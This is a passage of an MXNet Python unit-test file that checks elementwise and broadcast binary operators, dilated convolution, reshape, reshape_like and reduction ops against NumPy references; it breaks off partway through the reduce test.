        ((2, 52, 1, 4, 1), (1, 52, 60, 1, 37)),
        ((1, 23, 7, 122, 50), (2, 1, 7, 1, 50)),
        ((1, 17, 1, 5, 1), (22, 1, 2, 1, 28)),
        ((29, 1, 2, 1, 8), (29, 22, 1, 130, 1)),
        ((2, 36, 1, 427, 3), (1, 36, 11, 427, 1)),
        ((1, 2, 1, 100, 7), (1, 2, 448, 100, 1)),
        ((1, 2, 495, 77, 7), (1, 2, 1, 1, 7)),
        ((1, 43, 65, 2, 1), (1, 43, 65, 1, 225)),
        ((1, 92, 434, 2, 2), (1, 92, 1, 2, 2)),
        ((1, 92, 1, 4, 1), (1, 92, 134, 1, 17)),
        ((1, 53, 2, 122, 143), (1, 1, 2, 1, 143)),
        ((1, 179, 1, 87, 17), (1, 179, 1, 1, 17)),
        ((1, 1, 17, 5, 1), (1, 22, 1, 1, 28)),
        ((1, 2, 1, 1, 8), (1, 2, 52, 430, 1)),
        ((1, 163, 1, 22, 3), (1, 163, 116, 22, 1)),
        ((1, 1, 44, 30, 7), (1, 1, 44, 30, 1)),
        ((1, 1, 1, 1, 28), (1, 127, 1, 5, 28)),
        ((1, 2, 394, 38, 1), (1, 2, 394, 38, 16)),
        ((1, 10, 49, 77, 17), (1, 1, 1, 1, 17)),
        ((1, 431, 6, 2, 225), (1, 1, 6, 2, 225)),
        ((1, 15, 1, 28, 1), (1, 15, 1, 28, 463)),
        ((1, 129, 2, 48, 96), (1, 129, 2, 1, 1)),
        ((1, 1, 403, 17, 2), (1, 44, 403, 17, 2)),
        ((1, 1, 65, 2, 22), (1, 1, 65, 1, 1)),
        ((1, 24, 103, 17, 18), (1, 24, 1, 1, 1)),
        ((1, 1, 1, 1, 2), (1, 24, 194, 50, 1)),
        ((1, 1, 107, 84, 9), (1, 1, 1, 1, 1)),
    ]
    if idx < len(fixed_shape_pairs):
        l_shape, r_shape = fixed_shape_pairs[idx]
    else:
        # Random case: ndim in [1, 5] and every dim in [1, 5]. Each side
        # keeps a dim with probability 1/2 (or keeps all dims ~1/5 of the
        # time), otherwise collapses it to 1 so the pair still broadcasts.
        ndim = np.random.randint(1, 6)
        shape = np.random.randint(1, 6, size=(ndim,))
        l_same_dim = np.random.randint(0, 5)
        r_same_dim = np.random.randint(0, 5)
        l_axis_flags = np.random.randint(0, 2, size=ndim)
        r_axis_flags = np.random.randint(0, 2, size=ndim)
        if l_same_dim == 4:
            l_axis_flags = np.ones(ndim)
        if r_same_dim == 4:
            r_axis_flags = np.ones(ndim)
        l_shape = shape.copy()
        r_shape = shape.copy()
        l_shape[np.where(l_axis_flags == 0)] = 1
        r_shape[np.where(r_axis_flags == 0)] = 1
    return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    """Integer variant of gen_broadcast_data: scale by 100, round to int."""
    lhs, rhs = gen_broadcast_data(idx)
    return [np.round(lhs * 100).astype(int), np.round(rhs * 100).astype(int)]
def gen_binary_data(dummy):
    """Return two random float arrays sharing one random shape
    (ndim in [1, 5], every dim in [1, 5]). `dummy` is ignored.
    """
    ndim = np.random.randint(1, 6)
    shape = tuple(np.random.randint(1, 6, size=(ndim,)))
    return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    """Integer variant of gen_binary_data: scale by 100, round to int."""
    lhs, rhs = gen_binary_data(dummy)
    return [np.round(lhs * 100).astype(int), np.round(rhs * 100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
    """Run `symbol` forward on generated input pairs and compare against a
    NumPy reference.

    :param symbol: mx Symbol with two inputs named 'a' and 'b'.
    :param baseline: callable(a, b) -> ndarray, the NumPy reference.
    :param gen_data: callable(i) -> [a, b] producing the i-th input pair.
    :param mx_nd_func: optional mx.nd function checked on the same inputs.
    On mismatch, dumps the offending values (incl. exact IEEE-754 hex bit
    patterns) before failing.
    """
    sample_num = 200
    for i in range(sample_num):
        d = gen_data(i)
        y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
        y.forward(is_train=True)
        y = y.outputs[0].asnumpy()
        x = baseline(d[0], d[1]).astype(y.dtype)
        if mx_nd_func is not None:
            d0 = mx.nd.array(d[0], dtype=d[0].dtype)
            d1 = mx.nd.array(d[1], dtype=d[1].dtype)
            assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
        # Elementwise mask of values outside the tolerance envelope.
        idx = np.abs(x-y) > atol+rtol*np.abs(x)
        if idx.any():
            import binascii
            np.set_printoptions(precision=20)
            logging.error('found precision problem:')
            d[0] = np.broadcast_to(d[0], x.shape)
            d[1] = np.broadcast_to(d[1], x.shape)
            logging.error('input a: {}'.format(d[0][idx]))
            logging.error('input b: {}'.format(d[1][idx]))
            logging.error("output x: {} {}".format(x.dtype, x))
            logging.error("output y: {} {}".format(y.dtype, y))
            def ftohex(xs):
                # Exact IEEE-754 double bit patterns of the offending values.
                import struct
                return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
            logging.error('output x in baseline(a, b): {}'.format(x[idx]))
            logging.error('output y in symbol(a, b): {}'.format(y[idx]))
            logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
            logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
            logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            # Bug fix: this line previously dumped d[1] under the label
            # 'input a hex', duplicating the label of the line above.
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
            logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
        assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
    """Check `symbol`'s input gradients against the NumPy `baseline`
    gradient function, reducing broadcast gradients back to input shapes.
    """
    def collapse_to(shape, grad):
        # Sum `grad` along every axis that was broadcast so the result
        # matches the original input `shape` again (keeping ndim).
        if shape == grad.shape:
            return grad
        kept = list(grad.shape)
        for ax in range(len(shape)):
            if grad.shape[ax] != shape[ax]:
                kept[ax] = 1
                grad = np.sum(grad, axis=ax).reshape(kept)
        return grad

    for i in range(200):
        d = gen_data(i)
        out = np.random.random((d[0] + d[1]).shape)
        grad_a, grad_b = baseline(out, d[0], d[1])
        expected_a = collapse_to(d[0].shape, grad_a)
        expected_b = collapse_to(d[1].shape, grad_b)
        actual_a = mx.nd.empty(d[0].shape)
        actual_b = mx.nd.empty(d[1].shape)
        executor = symbol.bind(default_context(),
                               args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
                               args_grad=[actual_a, actual_b])
        executor.forward(is_train=True)
        executor.backward([mx.nd.array(out)])
        assert_allclose(actual_a.asnumpy(), expected_a, rtol=rtol, atol=atol)
        assert_allclose(actual_b.asnumpy(), expected_b, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
    """Test elementwise binary operators built from Python operators on
    symbols (+, -, *, /, %, **, !=) against NumPy references, checking both
    forward outputs and input gradients on random same-shape pairs.
    """
    a = mx.sym.Variable('a')
    b = mx.sym.Variable('b')

    def test_bplus(a, b):
        # d(a+b)/da = g, d(a+b)/db = g
        c = a + b
        check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)

    def test_bminus(a, b):
        # d(a-b)/da = g, d(a-b)/db = -g
        c = a - b
        check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)

    def test_bmul(a, b):
        # d(a*b)/da = g*b, d(a*b)/db = g*a
        c = a * b
        check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)

    def test_bdiv(a, b):
        # d(a/b)/da = g/b, d(a/b)/db = -g*a/b^2
        c = a / b
        check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)

    def test_bmod(a, b):
        # Python and numpy operate only in double so to avoid numerical errors we have to use
        # doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
        #c = a % b
        c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
        # '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
        check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
        check_binary_op_backward(c,
            lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)

    def test_bmod_int(a, b):
        # Integer modulo: gradients are defined as zero on both inputs.
        c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
        check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
        check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)

    def test_bpow(a, b):
        # d(a**b)/da = g*b*a^(b-1), d(a**b)/db = g*a^b*ln(a)
        c = a ** b
        check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
                                        g_out * a ** b * np.log(a)), gen_binary_data)

    def test_bneq(a, b):
        # Comparison op: zero gradient on both inputs.
        c = a != b
        # '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
        # Issue exposed with seed 1644387363
        check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
        check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)

    test_bplus(a, b)
    test_bminus(a, b)
    test_bmul(a, b)
    test_bdiv(a, b)
    test_bmod(a, b)
    test_bmod_int(a, b)
    test_bpow(a, b)
    test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
    """Test broadcasting binary symbols (broadcast_plus/minus/mul/div/mod/
    power/equal/maximum/minimum and the logical and/or/xor ops) against
    NumPy references, for forward outputs and input gradients.
    """
    def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
        """This function ensures that checking the numerical gradient of
        broadcast_max/min is not crossing the boundary y=x where there
        is no gradient definition at those singularities."""
        x_max = np.max(x)
        y = x_max + 2 * delta + np.random.random(y.shape)
        check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
        x_min = np.min(x)
        y = x_min - 2 * delta - np.random.random(y.shape)
        check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)

    a = mx.sym.Variable('a')
    b = mx.sym.Variable('b')

    def test_bplus(a, b):
        c = mx.sym.broadcast_plus(a, b)
        check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)

    def test_bminus(a, b):
        c = mx.sym.broadcast_minus(a, b)
        check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)

    def test_bmul(a, b):
        c = mx.sym.broadcast_mul(a, b)
        check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)

    def test_bdiv(a, b):
        c = mx.sym.broadcast_div(a, b)
        check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)

    def test_bmod(a_, b_):
        # Python and numpy operate only in double so to avoid numerical errors we have to use
        # doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
        a = mx.sym.cast(a_, dtype='float64')
        b = mx.sym.cast(b_, dtype='float64')
        # '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
        c = mx.sym.broadcast_mod(a, b)
        check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
        # NOTE(review): the backward check uses gen_binary_data (same-shape
        # pairs) rather than gen_broadcast_data — possibly deliberate to
        # sidestep broadcast-reduction of '%' gradients; confirm before changing.
        check_binary_op_backward(c,
            lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)

    def test_bmod_int(a, b):
        # Integer modulo: gradients are defined as zero on both inputs.
        c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
        check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
        check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)

    def test_bpow(a, b):
        c = mx.sym.broadcast_power(a, b)
        check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
        check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
                                        g_out * a ** b * np.log(a)), gen_broadcast_data)

    def test_bequal(a, b):
        # Comparison op: zero gradient on both inputs.
        c = mx.sym.broadcast_equal(a, b)
        check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
                                mx_nd_func=mx.nd.equal)
        check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)

    def test_bmax(a, b):
        c = mx.sym.broadcast_maximum(a, b)
        check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
        # pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
        data = gen_broadcast_data(idx=200)
        check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)

    def test_bmin(a, b):
        c = mx.sym.broadcast_minimum(a, b)
        check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
        # pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
        data = gen_broadcast_data(idx=200)
        check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)

    def test_band(a, b):
        c = mx.sym.broadcast_logical_and(a, b)
        check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
        # pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
        data = gen_broadcast_data(idx=200)
        check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)

    def test_bor(a, b):
        c = mx.sym.broadcast_logical_or(a, b)
        check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
        # pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
        data = gen_broadcast_data(idx=200)
        check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)

    def test_bxor(a, b):
        c = mx.sym.broadcast_logical_xor(a, b)
        check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
        # pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
        data = gen_broadcast_data(idx=200)
        check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)

    test_bplus(a, b)
    test_bminus(a, b)
    test_bmul(a, b)
    test_bdiv(a, b)
    test_bmod(a, b)
    test_bmod_int(a, b)
    test_bpow(a, b)
    test_bequal(a, b)
    test_bmax(a, b)
    test_bmin(a, b)
    test_band(a, b)
    test_bor(a, b)
    test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
    """Feed a unit impulse through a dilated all-ones convolution and check
    the forward response, the input gradient, and (approximately) the
    weight gradient.

    :param dil: dilation per spatial dimension; its length sets the
        dimensionality (1-D or 2-D).
    :param kernel_shape: kernel size per spatial dimension; must have the
        same length as `dil`.
    :param verbose: unused; kept for signature compatibility.
    """
    dim = len(dil)
    assert(len(kernel_shape) == dim)
    # Input for spike response
    data_size = 33
    data_shape = (1, 1) + (data_size,) * dim
    center = (0,0) + (data_size // 2,) * dim
    spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
    spike_imgs[center] = 1.0
    spike_img = mx.nd.array(spike_imgs)
    spike_img2 = mx.nd.array(spike_imgs)
    kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
    kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
    kernel = mx.symbol.Variable('kernel')
    in_img = mx.symbol.Variable('input')
    net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
    net.list_arguments()
    be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
                args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
    be.forward(True)
    out_o = be.outputs[0].asnumpy()
    ndo = be.outputs[0]  # NOTE(review): unused; preserved as-is.
    # Backprop a unit spike placed at the output center.
    out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
    out_grads[center] = 1.0
    out_grad = mx.nd.array(out_grads)
    be.backward([out_grad])
    vgrad = be.grad_arrays[0].asnumpy()
    out = out_o.reshape(out_o.shape[2:])
    nz_loc = np.nonzero(out)  # NOTE(review): unused; preserved as-is.
    # With all-ones weights the impulse response must sum to the number of
    # kernel taps; likewise for the input gradient of an output spike.
    assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
    assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
    # Now check whether the input gradient was computed correctly
    input_grad = mx.nd.array(vgrad)
    be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
    be.forward(True)
    out_o = be.outputs[0].asnumpy()
    assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
    # Random-kernel check: take one gradient step on the weights and verify
    # the output at the center moves by roughly the gradient magnitude.
    rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
    impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at the output center
    rnd_kernel = mx.nd.array(rnd_kernel_s)
    rnd_kernel2 = mx.nd.array(rnd_kernel_s)
    white_in = mx.nd.ones(shape=data_shape)
    white_in2 = mx.nd.ones(shape=data_shape)
    be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
                args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
    be.forward(True)
    be.backward([impulse_error])
    out_orig = be.outputs[0].asnumpy()
    kernel_gradient = be.grad_arrays[1].asnumpy()
    dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
    be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
    be.forward(True)
    out = be.outputs[0].asnumpy()
    # Now do a simple check of the kernel gradient
    assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
    """Run the impulse-response check over 1-D and 2-D dilation/kernel
    combinations."""
    cases_1d = itertools.product([(1,), (2,), (3,)],
                                 [(1,), (2,), (3,), (4,)])
    cases_2d = itertools.product([(1, 1), (2, 2), (3, 3)],
                                 [(3, 3), (4, 4), (2, 3), (3, 2), (1, 1)])
    for dil, ks in itertools.chain(cases_1d, cases_2d):
        test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
    """Test mx.sym.Reshape: the shape/reverse arguments (including the
    special codes 0, -1, -2, -3, -4), shape inference through JSON
    serialization, the legacy target_shape API, and Flatten.
    """
    def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
        # Check inferred output shape, forward value, backward gradient, and
        # backward shape inference when one src dim is left unknown (0).
        net = mx.sym.Variable("data")
        net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
        js = net.tojson()
        # Round-trip through JSON to make sure the attributes serialize.
        net = mx.sym.load_json(js)
        _, output_shape, __ = net.infer_shape(data=src_shape)
        assert output_shape[0] == dst_shape, \
            'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
            'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
                                  str(dst_shape), str(output_shape[0]))
        dat_npy = np.random.rand(*src_shape)
        grad_npy = np.random.rand(*dst_shape)
        exe = net.simple_bind(default_context(), data=src_shape)
        exe.arg_dict['data'][:] = dat_npy
        exe.forward(is_train=True)
        # Reshape must preserve values elementwise in both directions.
        assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
            'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
            %(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
        exe.backward(out_grads=mx.nd.array(grad_npy))
        assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
            'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
            %(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
        for i in range(len(src_shape)):
            # Zero out one src dim and verify it is recovered from the
            # known dst shape via backward shape inference.
            holdout_src_shape = list(src_shape)
            holdout_src_shape[i] = 0
            holdout_src_shape = tuple(holdout_src_shape)
            net = mx.sym.Variable('data')
            net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
            input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
            assert output_shape[0] == dst_shape, \
                'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
                'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
                                      str(dst_shape), str(output_shape[0]))
            assert input_shape[0] == src_shape, \
                'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
                'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
                                      str(dst_shape), str(output_shape[0]))
    # Test new api (Using shape)
    # Each case: [src_shape, shape args, reverse flag, expected dst shape].
    test_cases = [
        [(2, 3, 5, 5), (0, -1), False, (2, 75)],
        [(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
        [(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
        [(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
        [(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
        [(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
        [(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
        [(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
        [(2, 3, 5, 6), (-3, -3), False, (6, 30)],
        [(2, 3, 5, 6), (-3, -1), False, (6, 30)],
        [(64,), (-4, 16, 4), False, (16, 4)],
        [(64,), (-4, 16, -1), False, (16, 4)],
        [(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
        [(2, 3, 5, 5), (0, -1), True, (5, 30)],
        [(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
        [(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
        [(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
        [(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
        [(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
        [(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
        [(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
        [(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
        [(2, 3, 5, 6), (-3, -3), True, (6, 30)],
        [(64,), (16, 4, -4), True, (16, 4)],
        [(64,), (16, -1, -4), True, (16, 4)],
        [(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
    for test_case in test_cases:
        test_reshape_new(*test_case)
    # Test old api
    net = mx.sym.Variable("data")
    net = mx.sym.Reshape(net, target_shape=(2, 0))
    js = net.tojson()
    net = mx.sym.load_json(js)
    _, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
    assert(output_shape[0] == (2, 75))
    # Test for Flatten
    data = mx.sym.Variable("data")
    net = mx.sym.Flatten(data)
    exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
    data_npy = np.random.normal(size=(5, 4, 3, 7))
    out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
    outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
    assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
    exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
    assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
    """Test mx.sym.reshape_like with begin/end ranges on both inputs, plus
    the legacy whole-shape form."""
    def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
        # Check inferred shape, forward value, and backward gradient for one
        # (lhs, rhs, ranges) combination.
        lhs = mx.sym.Variable("lhs")
        rhs = mx.sym.Variable("rhs")
        net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
        js = net.tojson()
        # Round-trip through JSON to make sure the attributes serialize.
        net = mx.sym.load_json(js)
        _, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
        assert output_shape[0] == dst_shape, \
            'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
            %(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
        lhs_npy = np.random.rand(*lhs_shape)
        rhs_npy = np.random.rand(*rhs_shape)
        grad_npy = np.random.rand(*dst_shape)
        exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
        exe.arg_dict['lhs'][:] = lhs_npy
        exe.arg_dict['rhs'][:] = rhs_npy
        exe.forward(is_train=True)
        # reshape_like must preserve lhs values elementwise in both directions.
        assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
            'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
            %(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
        exe.backward(out_grads=mx.nd.array(grad_npy))
        assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
            'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
            %(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
    # Test new api (Using shape)
    # Each case: [lhs_shape, rhs_shape, lhs_begin, lhs_end, rhs_begin,
    # rhs_end, expected dst shape].
    test_cases = [
        [(30,), (15,2,4), 0, None, 0, 2, (15,2)],
        [(30,), (15,2,4), None, 1, None, 2, (15,2)],
        [(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
        [(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
        [(3,5), (1,15,4), 0, None, 1, -1, (15,)],
        [(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
        [(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
    ]
    for test_case in test_cases:
        test_reshape_like_new(*test_case)
    # Test old api
    lhs = mx.sym.Variable("lhs")
    rhs = mx.sym.Variable("rhs")
    net = mx.sym.reshape_like(lhs, rhs)
    js = net.tojson()
    net = mx.sym.load_json(js)
    _, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
    assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
    """Randomized forward/backward tests of reduction operators against numpy.

    Covers sum, mean, prod, nansum, nanprod, max, min and norm, including
    `keepdims`, `exclude`, and reduction with an explicit `axis=None`.
    """
    sample_num = 500

    def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
                          test_exclude=True, test_none_axis=False):
        # numpy_reduce_func: reference forward; numpy_reduce_grad_func: reference gradient.
        for i in range(sample_num):
            # Random input: ndim in [1, 5], every dim in [1, 5]; a NaN is
            # inserted per element with probability nan_prob.
            ndim = np.random.randint(1, 6)
            shape = np.random.randint(1, 6, size=(ndim,))
            axis_num = np.random.randint(0, ndim, size=1)  # NOTE(review): assigned but never used
            axis_flags = np.random.randint(0, 2, size=ndim)
            if test_exclude:
                exclude = np.random.randint(0, 2)
            else:
                exclude = False
            # Build the axis argument as None, a single int, or a tuple.
            axes = []
            for (axis, flag) in enumerate(axis_flags):
                if flag:
                    axes.append(axis)
            if 0 == len(axes):
                axes = None
            elif 1 == len(axes):
                axes = axes[0]
            else:
                axes = tuple(axes)
            keepdims = np.random.randint(0, 2)
            a = mx.symbol.Variable('a')
            if axes is None:
                if test_none_axis:
                    b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
                else:
